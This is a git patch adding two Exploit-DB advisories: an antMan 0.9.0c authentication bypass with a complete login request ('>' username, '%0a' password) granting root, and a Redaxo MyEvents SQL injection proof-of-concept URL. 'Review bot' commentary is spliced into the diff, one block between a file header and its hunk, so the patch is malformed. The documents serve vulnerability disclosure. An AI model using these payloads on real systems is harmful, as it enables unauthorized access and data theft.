From a2480f5b984ebfe1f0dd74771290f29a517f109f Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 8 Mar 2018 05:01:46 +0000
Subject: [PATCH] DB: 2018-03-08

2 changes to exploits/shellcodes

Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection
antMan 0.9.0c - Authentication Bypass
---
 exploits/java/webapps/44262.txt | 39 +++++++++++++++++++++++++++++++++
 exploits/php/webapps/44261.txt | 20 +++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 61 insertions(+)
 create mode 100644 exploits/java/webapps/44262.txt
 create mode 100644 exploits/php/webapps/44261.txt

diff --git a/exploits/java/webapps/44262.txt b/exploits/java/webapps/44262.txt
new file mode 100644
index 000000000..7b09cde20
--- /dev/null
+++ b/exploits/java/webapps/44262.txt
@@ -0,0 +1,39 @@
+# Exploit Title: antMan <= 0.9.0c Authentication Bypass
+# Date: 02-27-2018
+# Software Link: https://www.antsle.com
+# Version: <= 0.9.0c
+# Tested on: 0.9.0c
+# Exploit Author: Joshua Bowser
+# Contact: joshua.bowser@codecatoctin.com
+# Website: http://www.codecatoctin.com
+# Category: web apps
+
+1. Description
+
+antMan versions <= 0.9.c contain a critical authentication defect, allowing an unauthenticated attacker to obtain root permissions within the antMan web management console.
+
+http://blog.codecatoctin.com/2018/02/antman-authentication-bypass.html
+
+
+2. Proof of Concept
+
+The antMan authentication implementation obtains user-supplied username and password parameters from a POST request issued to /login. Next, antMan utilizes Java’s ProcessBuilder class to invoke, as root, a bash script called antsle-auth.
+
+This script contains two critical defects that allow an attacker to bypass the authentication checks. By changing the username to > and the password to a url-encoded linefeed (%0a), we can force the authentication script to produce return values not anticipated by the developer.
+
+To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows:
+
+#-------------------------
+POST /login HTTP/1.1
+Host: 10.1.1.7:3000
+[snip]
+
+username= > &password=%0a
+#-------------------------
+
+You will now be successfully authenticated to antMan as the administrative root user.
+
+
+3. Solution:
+
+Update to version 0.9.1a
\ No newline at end of file
diff --git a/exploits/php/webapps/44261.txt b/exploits/php/webapps/44261.txt
new file mode 100644
index 000000000..26052318a
--- /dev/null
+++ b/exploits/php/webapps/44261.txt
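Review bot: The Description paragraph states the affected range as `antMan versions <= 0.9.c`, which drops the minor digit that the header's `# Version: <= 0.9.0c` and `# Tested on: 0.9.0c` lines carry; `antMan versions <= 0.9.0c` would keep all three fields consistent for anyone triaging by version string. The Solution section gives only the fixed version, while the Proof of Concept already names the root cause (credentials passed from ProcessBuilder to a root-privileged bash script), so one sentence there on what the fix changes — presumably credential checking that no longer hands request parameters to a shell — would let an operator verify the upgrade actually closes the defect rather than just matching a version number. The same paragraph could note that failed or odd logins with a bare `>` username or a linefeed in the password are the record a defender would look for in the antMan access log.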
@@ -0,0 +1,20 @@
+# Exploit Title: Redaxo CMS Addon MyEvents SQL Injection [ Backend ]
+# Date: 01.03.2018
+# Exploit Author: h0n1gsp3cht
+# Vendor Homepage: http://www.github.com/wende60/myevents
+# Version: 2.2.1 (Last Version)
+# Tested on: LinuxMint
+# More: Login Required
+# GET
+
+##############
+Vuln Code [+] redaxo/src/addons/myevents/pages/event_add.php
+##############
+
+$myevents_id            =  strip_tags(rex_request('myevents_id', 'string'));
+
+###############
+POC
+###############
+
+http://127.0.0.1/redaxo/index.php?page=myevents/event_add&myevents_id=[SQL]
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 51e510565..ac3e52553 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -38970,3 +38970,5 @@ id,file,description,date,author,type,platform,port
 44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
 44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
 44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,
+44261,exploits/php/webapps/44261.txt,"Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection",2018-03-07,h0n1gsp3cht,webapps,php,80
+44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000
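Review bot: The `Vuln Code` section quotes only the line that reads `myevents_id` through `strip_tags`, not the query the value is later used in, so the advisory does not show where in `event_add.php` the injection actually occurs; quoting or at least naming the SQL sink would make the finding verifiable from the file alone. It is also worth saying explicitly that `strip_tags` removes HTML markup and leaves SQL metacharacters untouched, which is presumably why the value still reaches the query unescaped — readers sometimes take the presence of a sanitizer as evidence the input is safe. A one-line remediation note (bind the value with a prepared statement, or if the id is numeric, request it as an integer via the `rex_request` type argument rather than `'string'` — confirm the exact type name against the REDAXO API) would complete the entry, since the header has no Solution section and the vendor link is the only pointer to a fix.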